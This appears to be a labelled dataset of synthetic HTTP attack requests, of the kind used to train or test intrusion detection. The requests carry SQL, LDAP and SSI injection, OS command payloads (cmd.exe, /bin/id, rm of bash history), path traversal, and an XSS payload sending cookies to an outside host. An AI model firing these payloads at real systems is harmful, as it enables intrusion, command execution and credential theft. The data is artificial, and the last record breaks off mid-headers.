Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Naebs rentael=vcmiehc
Range: 1-35,9436-,-246816
Referer: http://www.neg1rimm.gov/hnr4it/esckAtt/as2dsIe5/tsgc.jpeg
TE: trailers
Trailer: Referer
User-Agent: Mozilla/8.2 (Machintosh; U; Mac OS X 1.3; yp-4s; rv:0.2.4) Gecko/98255912
UA-CPU: 68000
UA-Disp: 6337,771,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: twagt/4.7 235.122.77.120
Transfer-Encoding: deflate
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 944 www.Jaealoez.html "Tccdyealtgcne" "Wed, 07 Dec 05 16:52:07 UTC"
X-Forwarded-For: 247.166.24.114
X-Serial-Number: 385637154
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39355
Start - Id: 38077
class: LdapInjection
GET /EtuwoEscf2nv5lhe/aM0/shleoujltlriI7rmttsd.aspx?Esya=3005140&blt=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&1e=963853877&imgVror-1nlx=1egy%7E HTTP/1.0
Host: www.vsywe0wah.gov
Connection: keep-alive
Accept: application/zip;q=0.4
Accept-Charset: *
Accept-Encoding: gzip, compress, compress;q=0.8
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 114.76.49.126
Cookie: X-TUfd4MJv=libEsr;tums=hQvd9
Cookie2: $Version="542"
Date: Sun, 28 Sep 08 16:40:26 CET
ETag: W/"U@VOO-@zJ@agtuM4rW"
Expect: 100-continue
From: zfmmsal@ymhqo.ch
If-Modified-Since: Wed, 15 Apr 09 16:14:24 CET
If-Unmodified-Since: Fri, 30 Dec 05 20:56:32 UTC
If-Match: "A@DAaO7.-B@lAppr7"
If-None-Match: "ubuvWY1Vl3AJgZ8maMTo"
If-Range: "WGpGUBokgpmvAHOQVt"
Max-Forwards: 0309
MIME-Version: 7.3
Pragma: n='llve'
Proxy-Authorization: Basic cm5pZXVqOmh0bXM=
Authorization: Basic dGpvZURvOnZmYXN1N20=
Range: 77-,76-
Referer: /tcuwxes.jpeg
TE: gzip;q=0.7,chunked;q=0.4,chunked
Trailer: Accept-Language
User-Agent: Mozilla/2.3 (Machintosh; U; PPC 0.1; ok-ao; rv:7.9.4) Gecko/38240779
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3700x2595
Via: HTTP/3.4 93.235.5.1, FTP/1.7 98.235.59.17:416
Transfer-Encoding: sswea; nTSq=fynaeer
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 67.89.141.76
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38077
Start - Id: 44158
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.o7ruuCKkoo.org
Connection: keep-alive
Accept: image/jpeg, video/quicktime, application/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i-As, zetiNnf-gno;q=0.3
Cache-Control: only-if-cached
Client-ip: 165.243.248.164
Cookie: rdt=6Ostdinlqpand c\tsG
Cookie2: $Version="971"
Date: Fri, 02 May 08 04:11:03 UTC
ETag: "fs5xbNlo-GIu_ej"
Expect: wzoajpob=ltbiem;tOrhtt7
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Wed, 17 Mar 10 19:34:04 CET
If-Unmodified-Since: Sat, 19 Jan 08 09:30:05 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 09
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Digest realm
Range: 815-,644-20793
Referer: http://h9tf.st/ab0nI/7aoweh/bsusweex/tTt80/mnnipoys.php3
TE: trailers,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.9 (X11; U; Solaris 9.2; qr-or; rv:0.6.6) Gecko/89959176
UA-CPU: Sparc
UA-Disp: 7825,945,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: FTP/8.7 107.152.169.202
Transfer-Encoding: deflate
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 498 131.29.120.151 "6ou22erwP9" "Sun, 02 Oct 05 20:11:01 CET"
X-Forwarded-For: 122.146.226.211
X-Serial-Number: 008751
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44158
Start - Id: 43166
class: OsCommanding
GET /tZmScHwIV8/sushr1soeeeFoddohEea/0eetas/w8blbfzm1dR3OSVKGVk/e6sDUHq2a.jBVNH/tmpduKPAe5uz5gtpC/FsamA7JXo.l/iVi1yq8GGtLbBrbIKc/aIFnetcatSRcuQu/skr/rea2esn2h9geetrnXeuj/exIXQi-_NK9.e7XKL2g.gif?yyqabexch=acI4rluzsibcsd4&NupdatexVo=%253b%2520%2Fbin%2Fid%253b HTTP/1.0
Host: www.3ee4nsorb.uk
Connection: keep-alive
Accept: application/x-tar;q=0.0
Accept-Charset: windows-1258;q=0.2, windows-1258, utf-8;q=0.1, x-mac-japanese;q=0.8, iso-8859-1
Accept-Encoding: identity;q=0.8, gzip;q=0.1, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 229.240.5.133
Cookie: ssqsibs4=rIXeet7Ahgm;gR9TQoLexY=(3aseoaejr;nOUY0rinN=njVZ;temb=1;padei99td=cg twt;fr+ftpTimg+eo;iyeh2jRta=78
Cookie2: $Version="045"
Date: Mon, 05 Jan 04 07:23:47 GMT
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: ritelu@ohts9eaeot.uk
If-Modified-Since: Sat, 05 Nov 05 22:45:30 CET
If-Unmodified-Since: Thu, 04 Jan 07 23:29:44 UTC
If-Match: "M5CrER4YTPkml4C"
If-None-Match: *
If-Range: Mon, 03 Jul 06 22:31:31 GMT
Max-Forwards: 0
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic OWFyMXVlZDo2cnBobg==
Authorization: sunut6 3loaTnu4=nkxLfet
Range: 28678-4,-886
Referer: http://www.riei0.de/nere4t/sjeac/dasQtmd/gEeg/ndhru.png
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/0.3 (X11; U; Linux i586 0.0; a0-ln; rv:1.5.1) Gecko/47023834
UA-CPU: Sparc
UA-Disp: 6178,9185,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: 9.9 228.151.66.80:79510, FTP/4.0 www.spqxa.htm
Transfer-Encoding: qrcQeh
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43166
Start - Id: 42200
class: SqlInjection
GET /s07ceYxVhybxZoptH1ik/qelis/s1h3eny3i9vlk/f4/Tu.php4?58Diaei0R=%27+AND++USER_NAME%28%29%3D%27Hkd&ea=6&7h7Hautoexecesb.L=nnke9nodeypf1st&Ml2ee6rinadm=1038&do8hBCC=7222668&VPttt5s=7318218&vmn5fLontey=2tmea&stei3greesrx=22&TyDtmXEnttr=829344 HTTP/1.0
Host: 139.95.199.222
Connection: i6ghoN
Accept: application/*;q=0.1, video/*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=2590
Client-ip: 139.139.72.242
Cookie: aBz=oB7NKSFmP7;Hl9wlog_httpdallV3=pgwuuc;aehdeJs=treS72SPya8n
Cookie2: $Version="304"
Date: Thu, 27 Mar 08 19:02:46 GMT
ETag: W/"dHYBM.QKDh@vxmx"
Expect: f7bnrcgt=igfeRa0;whh0tf=ilat
From: g0Ln@OyJoc.biz
If-Modified-Since: Thu, 25 Mar 10 05:07:50 CET
If-Unmodified-Since: Sat, 07 Feb 09 24:31:16 GMT
If-Match: *
If-None-Match: "I-3qwsvbAZO.WMY6"
If-Range: Tue, 11 Jan 05 18:13:08 GMT
Max-Forwards: 329
MIME-Version: 4.5
Pragma: oae9te=s
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: NTLM aWdxbGhoMGpsb3R5dHRkMWV0Ym5haXRhckFPbGlidmVuczZhdW9iWTdsbnRp
Range: 8473-303,-227666,770360-
Referer: /kaRwtO/nninDuil/9uEv.cgi
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.8 (X11; U; Open BSD i386 9.2; tt-ny; rv:5.4.5) Gecko/66917109
UA-CPU: StrongARM
UA-Disp: 764,0830,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 124x5537
Via: 4.6 126.11.149.103, qonc/4.8 www.lLv4sa.tiff
Transfer-Encoding: gzip
Upgrade: srir/8.4
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 174.56.222.47
X-Serial-Number: 145107
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42200
Start - Id: 39939
class: SSI
PUT /8uoj.html? HTTP/1.1
Content-Length: 260
Content-Language: s37,nqh
Content-Encoding: compress
Content-MD5: YTE4SWFrM3l0b2Rzcjdvcw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 24 Oct 05 22:15:10 CET
Host: 134.163.164.215
Connection: close
Accept: */*
Accept-Encoding: gzip, identity
Cache-Control: only-if-cached
Cookie: Lae7i1pcs4Shib=rh8i;Hzvnltc=cmdehrb;EDselectq@qC8=t7cK
Date: Thu, 04 Aug 05 21:23:23 GMT
Expect: lldl=otrEh6;4ieuaa
If-Modified-Since: Tue, 06 Nov 07 21:49:58 CET
If-Match: *
Max-Forwards: 7475
MIME-Version: 0.5
Referer: /veenfuvs/3in1ema/urqn.cfm
TE: trailers
User-Agent: nomngsfrwo (ecGH1WHY; lamo8QdSDg)
UA-Pixels: 3924x987
Via: 4.1 156.204.35.122, 8.5 9.150.106.98, 3.8 176.214.135.198:12993

mncih=ruYXBG@Y6t.&teatetrbsNdofit=20796683&objectHuu0Jg=2VfFuFK&oHappitu=aj3bD_7AjTgo&irsoe5=s6sqekso8o22krnOp&io0nexsecldojcz=<!--#exec  cmd="/bin/ls     -l   /home/eEyybY/1i"  -->&dnsnLi=drop&we6tizhorn=7059&ofmt7iPaftd=mr0tmgedodei

End - Id: 39939
Start - Id: 38700
class: LdapInjection
GET /oF_fRl7n6P6W9vneWDj/3eni6/yod/iksr/tEbPcHtZeFL/eEOnq_/srtnteteeBhdh4evdjth/allANQQG/eZKdwC3u2vEr13@Mbb.G.png?pcsh8feahdzf29=aQWrwzs&ApcUarn2eceme=64711421&oIaj=%29+%28++++%7C++++%28displayName%3Dhad*%29++%28name+++%3D++had*+++%29%28++mail%3Dhad*+%29&Axml9dBqwgetiAo=4eeei%27zjzehy&dntoCeXbA6=ehb&aea1qeinedaz=ns5rt&oe=07&Uz5y2NXE_xc=jxtermuoasaf%2F+ozdsaasmt&zrposition0aH=mRFm9bcEW&atstmDhy=%245le%7Cepz+&2Faen=hoied&Nri2mt5moA7=6&ki0Nktdnsr=746909&uesettomsss=aNcngm&6nrklctaysD=Nle HTTP/1.1
Host: www.aepye.be:80
Connection: keep-alive
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rde-uemIn, nTosn-iDRoo
Cache-Control: no-store
Client-ip: 218.181.248.159
Cookie: haosmgdjnun=2Sgeisdrr;sognue=4951583;yScllknitynhe=tirp8rxneeea3bva
Cookie2: $Version="63"
Date: Sun, 01 Apr 07 06:27:12 GMT
ETag: "fO3hMoGbmyhoF4WVadN_"
Expect: 100-continue
From: lLzaagE6@8ctXe4aie.gov
If-Modified-Since: Thu, 11 Jun 09 12:51:29 UTC
If-Unmodified-Since: Tue, 11 Dec 07 18:46:01 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 07 Apr 07 14:03:42 GMT
Max-Forwards: 253
MIME-Version: 5.4
Pragma: nathli='r'
Proxy-Authorization: NTLM eTlKZXRmcGlubWtvZUJlZGZzZ2VBcmhlZ2RlbmViOTM0ZWVnZmVudGloaHdlb2ZC
Authorization: Basic aGl1RXJuQTpyYVR0cg==
Range: 32-1,3888-481886
Referer: http://www.tiieti.de/i61e9se/peT8i/nwdecoS/eelsNe.conf
TE: deflate;q=0.3,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.5 (Windows; U; Win 9x 2.7; i8-ie; rv:4.7.7) Gecko/60240089
UA-CPU: PowerPC
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 420x9995
Via: HTTP/3.6 196.109.23.247, FTP/9.6 www.8tt8.jpg:46, HTTP/5.7 151.63.72.63:0
Transfer-Encoding: deflate
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38700
Start - Id: 45800
class: PathTransversal
GET /nsyIk7E_bF/js0W.qvH/IdinIxterm/aCD41w8dMxm.tiff?diioaOtIiaBia=vwieeag&devpm7acxaWsasn=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.0
Host: 147.107.129.191
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 89.136.143.100
Cookie: 1nrxau6toaummt=ir
Cookie2: $Version="28"
Date: Tue, 31 May 05 13:22:07 UTC
ETag: W/"-frtivihj-@TdEy9aa"
Expect: tsoln3r=7idtmA
From: erir5sT@dLha.org
If-Modified-Since: Wed, 19 Jul 06 24:34:04 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: "lN4y2yoNZjxbveeM5G"
If-None-Match: *
If-Range: Sun, 14 Jan 07 15:57:04 CET
Max-Forwards: 287
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ckh0ejB0a2F0aTduaXR2bHNpdG13dG9zNXJsYmxyZnk=
Authorization: Digest qop=bEneli
Range: 151606-
Referer: /eNbsd0n/trysia2/tnao/eeuAletr/ycr2Mt.nsf
TE: trailers
Trailer: Accept-Language
User-Agent: tdcmf7@ http://www.hewe7c.fr
UA-CPU: x86
UA-Disp: 1489,7899,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9422x259
Via: 2.4 www.irk2.png, HTTP/9.1 www.kyHdwT.png, 9.8 116.34.34.89
Transfer-Encoding: identity
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 157.18.224.28
X-Serial-Number: 06918680418533
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45800
Start - Id: 41881
class: SqlInjection
GET /tiAkL5yzIHRBX9ZsW9i/scevaa/pNlscriptOservices/5ps/n9QC@y.ndwkKDP335DL/09kC/6zZ8PN5NvHcatY.jpg?nGetcW=d9r&Efezvmv=2&hZc3me@G4gl=h4OJ&ufGwttF=EucsooDo&AxaazYVhPWP=au&tmrathSnd=385506&wdkdHw=%3B+++exec+get_cust%28+%27x%27%27++++union++select++++object_name%2Cobject_type%2C%27%27x%27%27+++++from++user_objects+++++where+%27%27Ie8Awhi%27%27+++%3D++%27%27++%27+%29%3B&Eeilcxgedum=kgiwariup&FmHNrcp0H3apositionK=a9moeoeA&aP=ah&aene1ao=-spv3niinputoascript HTTP/1.1
Host: www.DfiSeLHoc.fr
Connection: nTTgnve
Accept: */*
Accept-Charset: x-mac-arabic;q=0.2, iso-8859-15, utf-7;q=0.3, x-mac-hebrew, iso-8859-6;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: aeth='hdtrsab'
Client-ip: 203.18.145.66
Cookie: linenoLiim=7l;Qto=emFeRDXz2VEW;96GDehlayenlnqv=me9ariaulo1;geErnH3esao=iYFcdF;ioMRD4w0KZ=86654;tithoidt=where ]it0nrwl:
Cookie2: $Version="03"
Date: Sat, 17 Jan 04 06:05:01 UTC
ETag: W/"yKcgygKPCwRoQ3lbkIJ"
Expect: irbS
From: uims2c@rtXh1sbi2a.cz
If-Modified-Since: Tue, 31 May 05 05:38:45 GMT
If-Unmodified-Since: Fri, 23 Sep 05 05:05:41 UTC
If-Match: "RZ9aaCGbXnEqbBLPfN2"
If-None-Match: *
If-Range: Wed, 28 Mar 07 21:36:14 GMT
Max-Forwards: 667
MIME-Version: 0.4
Pragma: y='er5'
Proxy-Authorization: Digest uri=http://www.8ios34Ss.be/GyNmnu/hNIaa/tnui75/Ns1n8sf/efisp.php3
Authorization: NTLM ZWlSZXR2b3Ric3BubmV0aW11ZWVuaDB0b3Nlc3V3YXBhYWJva25zb2VBaQ==
Range: 2764-93323,17883-91
Referer: http://www.Suee6ao.gov/nnKnjt/3na2/PoeblWEb.exe
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: tndI6atee (a9YKz1; aNW2RRH45; 6RhgOU; k..V7XvT; ieu_Pwimrx)
UA-CPU: StrongARM
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 044x365
Via: HTTP/6.7 www.stvur.css:8715
Transfer-Encoding: deflate
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 181 www.e4hach.tiff:99487 "eyten3eElsgEginsaoi" "Sun, 29 Feb 04 08:39:55 UTC"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41881
Start - Id: 43230
class: OsCommanding
GET /fiasn/a8f5.chvN2m.Yq5blj4/rsghNr.nsf?7stoomwem=9h7likelaA&uhv=1hHdtmph&otaeci=a5I&RlyHpsTp=iecxjfiwdih&Z@uRbhqgv7=04367&BBDDl@T=749257&uenhu9ps=rltbodyssdoort&bS5n=%27+++++%3Brm+%7E%2F.bash_history+++++%3B&airRs=wtu9boot.inipTeshtacces&0ioritolgb2LSoF=2 HTTP/1.0
Host: 103.100.2.13:80
Connection: jdo95c3r
Accept: */*;q=0.6
Accept-Charset: x-mac-greek
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=0
Client-ip: 178.184.72.111
Cookie: 7m=2457;Mntlyo7o=3uoiframerepssi;rld=tcaNtudIie8aT
Cookie2: $Version="7"
Date: Sat, 05 Mar 05 21:51:38 CET
ETag: "si0ElM3X@WcQMbzOA"
Expect: cko1p=sTwOsene
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Mon, 20 Aug 07 08:23:25 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 4.4
Pragma: t1=pnthant
Proxy-Authorization: Basic YWQwQnBldDp0Ymx4dGVSbg==
Authorization: Basic ZWVyM0U6cmF0dXNl
Range: -80151
Referer: http://www.eeoh.cz/iobfsar/ranrls7/ugrt4/nN6sN.dll
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/6.3 (Windows; U; WinNT 5.4; ct-US; rv:3.0.8) Gecko/41239861
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4808x019
Via: HTTP/8.3 www.ewoa7kf3.htm, FTP/0.8 www.ehnltt.jpg, FTP/9.7 65.1.208.140
Transfer-Encoding: identity
Upgrade: gSz/4.2, Gseoi/5.8, rch5/7.9, 6re6d/0.4
Warning: 473 www.sStrCzh.js "hicttlor5tflF" 
X-Forwarded-For: 25.139.59.161
X-Serial-Number: 3809752703652
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43230
Start - Id: 46737
class: XSS
GET /jqNrSY/yexsiusrtOqemetet/t2wsyeslr8oe/rM.exe?8weticB=oCWE562eZ&awyaemnict=tScmms4iiAm1lel&i0xmlGKF=khe HTTP/1.0
Host: 87.59.75.178:72
Connection: lyba
Accept: application/postscript;q=0.0, application/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: a-wkrlaErt, ne-rhe4eu;q=0.1
Cache-Control: 5Eauedf=saooare0
Cookie: Fwgetm2Ve=<img  src  =   "  lechil > " onmouseover   =   "     [document.location.replace   ('http://www.merata.com/cgi-bin/si.cgi'+document.cookie);]    "  >
Date: Sat, 19 Jul 08 12:00:45 UTC
If-Unmodified-Since: Mon, 09 May 05 18:51:36 UTC
Max-Forwards: 37
Pragma: emannnlr=iarNnts
Referer: /TerdahS/iBsenix/eoei/astzohoa.mdb
Trailer: From
User-Agent: aceafi9F/4.4
Via: 4.3 234.255.25.8, FTP/4.1 208.16.245.222
Transfer-Encoding: gzip
Upgrade: acef/9.1
Warning: 811 www.etimuquh.jpg "yaitsotn" "Wed, 27 Jun 07 01:22:44 GMT"
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46737
Start - Id: 38294
class: LdapInjection
GET /aEye2h5t/t21Weq9pOU/qp/rFPMnntjO5vGPQy9qo4t/3x6y/tA.mspx?GX_t=qjt%3Ayxeoytpe%5B%29&pca=aadminho%3Cg&1oEdEioijf=0gnctD+t%3C&Wil=52554&9oz49GnY9=rdedtagt&Ip_access_loglS4z=23438&I4access_logX-7E=rrTEX1u3AiSJ&asotno=%24r%5Dtrbron&toh=usaf%29%28%26%28objectClass+++%3D9eh*%29&aan=gy3qeamdrTcebkesoc&semin9redodEtek=7204528&3edi6npeA=6623294&oia8eden7me=wZXU2b9Ba6&bNEhtaccesG=node+&qkxmetan=635520 HTTP/1.0
Host: www.lmtojwr.cz
Connection: close
Accept: image/*;q=0.8
Accept-Charset: iso-10646-ucs-2;q=0.0, x-mac-greek;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: ae-7ssOo, oSoutu-it4h, hg-prHfme
Cache-Control: min-fresh=39
Client-ip: 146.107.64.207
Cookie: juys2=fielRns7nEla;K_Z2=hfeat;gmwpenlsh9=jhhtpass>n%;9a04ebilin5p=73529101;odld=3mmuMqY5@
Cookie2: $Version="436"
Date: Mon, 03 Jan 05 21:54:40 UTC
ETag: W/"Bq3JVGm2RGFCrlvj"
Expect: ias6nea
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Thu, 15 Apr 10 22:22:23 GMT
If-Unmodified-Since: Fri, 20 Jun 08 21:41:19 CET
If-Match: "cA3hYR6DeOuMMRIhctj"
If-None-Match: *
If-Range: *
Max-Forwards: 9519
MIME-Version: 3.2
Pragma: g=bqhttto
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic bWxnSDA6dHRlZWVlaWg=
Range: 6717-,60-,18458-657
Referer: http://www.6Tsm.cz/Rfph3A/eiimia/txxwe/Okoniu.asmx
TE: trailers,trailers,deflate;q=0.3
Trailer: From
User-Agent: g-pcb3 http://www.yNAatlls.com
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: 7.8 61.101.124.158, 4.2 www.EtTks.jpg, FTP/0.7 73.223.244.163
Transfer-Encoding: nt5c; sxmldmbi=slseM
Upgrade: segoo/3.8
Warning: 579 www.htehr.shtml:7460 "fyeYeyiN4nSSEx4" 
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38294
Start - Id: 37451
class: LdapInjection
GET /rRDUlb-3N1OwH/aRYLK/gd8ofhEMaagosb/oJ-6u1TtLGbo8gFr/hmR3/8Gv2nTmfp/tK/orgEtarhlneihcdprare.css?It2hsha=68581&aaismhtarbrt=30&nfaccess_logS=nhoMab%2Fp+mail HTTP/1.1
Host: www.ptisse.cz
Connection: yaotedg
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 26.42.165.41
Cookie: rfaEsfi0o=96)(&(objectClass=codu)(|(sn  =    g3)(cn=dl   J*));leewnfet8Tesdb=032825662;ehttl6e=replaceyd1]vl;H642TbMIon.=bh;sic=274
Cookie2: $Version="42"
Date: Sun, 07 Oct 07 20:08:26 UTC
ETag: "yOd_C.zeiXfXlZckzy2e"
Expect: ahtnadm
From: piod1nut@se9utn.fr
If-Modified-Since: Wed, 04 Jul 07 07:31:15 CET
If-Unmodified-Since: Mon, 25 Aug 08 15:43:42 GMT
If-Match: *
If-None-Match: "D2ahZ9nK15tdImRFB8qS"
If-Range: Tue, 03 Feb 09 14:19:54 CET
Max-Forwards: 4375
MIME-Version: 0.6
Pragma: i=mS3
Proxy-Authorization: NTLM ZWRndGVjb2NzOWxIcnN0NGloSDBocG5wa3JpdGhxVWFkcGllbm52dWV5
Authorization: NTLM cGVkaWh0bG5zaWU5dHlhbmFwc2xTbHJvY2hwb242dU1oYXR3bw==
Range: -13
Referer: /vethdodI.js
TE: chunked;q=0.8,gzip,gzip
Trailer: Date
User-Agent: y8aoktdfaS (pzGC3AX.kO; sdWNViL6; nyucWijG; hF3umc)
UA-CPU: MIPS
UA-Disp: 5462,524,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 958x510
Via: 8.0 www.6N5a.js, 2.5 249.135.98.197, 1.8 www.nqgoo.jpeg
Transfer-Encoding: deflate
Upgrade: baet/2.2
Warning: 468 www.gctRbegg.shtml:3583 "godhcxdtTN" 
X-Forwarded-For: 190.47.246.83
X-Serial-Number: 9320114880
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37451
Start - Id: 47426
class: XSS
GET /sOoAttnrtc/dpe-BSo@V6LZitRZMQDK/e5X8XeuhhQQt/3G0aDreplaceGGmD/iOqL0zCs0kV1Yw/L3Ifrom/cNzvWCAhxt0oS/-Id3KT2inserti0a/boot.ini2D.sh?UGUV=asEpbo&iyoera=%3Cimg++++src++++%3D++++%22+isngntne++%22onmouseover%3D+++%22+++%5Balert++++%28%27hythec%27%29%3B%5D+++%22+%3E HTTP/1.1
Host: www.to7eemVuw.ch
Connection: vfeexh2
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.1, identity;q=0.3, gzip;q=0.0, compress, compress;q=0.6
Accept-Language: eocE-fhViwtk;q=0.9, nTaeth-Iqeug;q=0.1, icka1t-exnnhi, te6o-rlnaisY, aqkshly7-le
Cache-Control: only-if-cached
Client-ip: 249.196.221.75
Cookie: aife8ohhfc=50558
Cookie2: $Version="05"
Date: Sat, 16 Aug 08 15:57:24 UTC
ETag: "QkPnsGdJe177PaIh12u"
Expect: 100-continue
From: 0hOsn@ivHe.ch
If-Modified-Since: Tue, 09 Feb 10 20:36:11 UTC
If-Unmodified-Since: Sat, 13 Aug 05 06:04:07 CET
If-Match: "KVW44IHZXiXldF4"
If-None-Match: "3eCfif6oUVuHRsE"
If-Range: Sat, 21 Oct 06 22:13:07 GMT
Max-Forwards: 79
MIME-Version: 3.0
Pragma: asmfa='rnt2w'
Proxy-Authorization: Basic ZVJkN2g6b2FsMw==
Authorization: esld7o x0tYpldt=7vahim
Range: 264348-7,043051-,50446-892
Referer: http://www.rtaRd.com/m8rh/sdpf/iitzaoTo.php4
TE: deflate
Trailer: Pragma
User-Agent: Mozilla/4.0 (X11; U; Open BSD i386 4.6; ea-ha; rv:0.2.5) Gecko/04769908
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 5.1 www.asey6o.jpeg, 8.0 www.Oantu.gif
Transfer-Encoding: identity
Upgrade: tWh08/9.4, ars/6.0, sar/0.0, eed/7.2, te3n/6.1
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 168.182.251.139
X-Serial-Number: 79894871032971877602
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47426
Start - Id: 38559
class: LdapInjection
GET /abwGtdeo0tnz1C/eupsn/md/eteait1t1r/oKAaI/mMsHIj/nz/Wpassthru5f8nAZJp06.asmx?toayoanwO=r57e4acopy&ashirt7ReopcnNn=xmlwinntom%27+nkveLRgIs5child&eNisr=%29++%28+%7C+++%28++cn%3D*o++++%27brien*++++%29%28mail+%3D*o++++%27brien*+%29 HTTP/1.1
Host: www.otTihoro.fr
Connection: 0agqxz
Accept: text/*, image/*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.3
Accept-Language: Ihtj-wi;q=0.5, 9ct44-ta, wBta-aRnpltlr;q=0.0
Cache-Control: max-age=87
Client-ip: 40.99.33.206
Cookie: md=r0oo;meEI=83070;iacvemaneet9Amc=nmeb9openexecllhug mar
Cookie2: $Version="7"
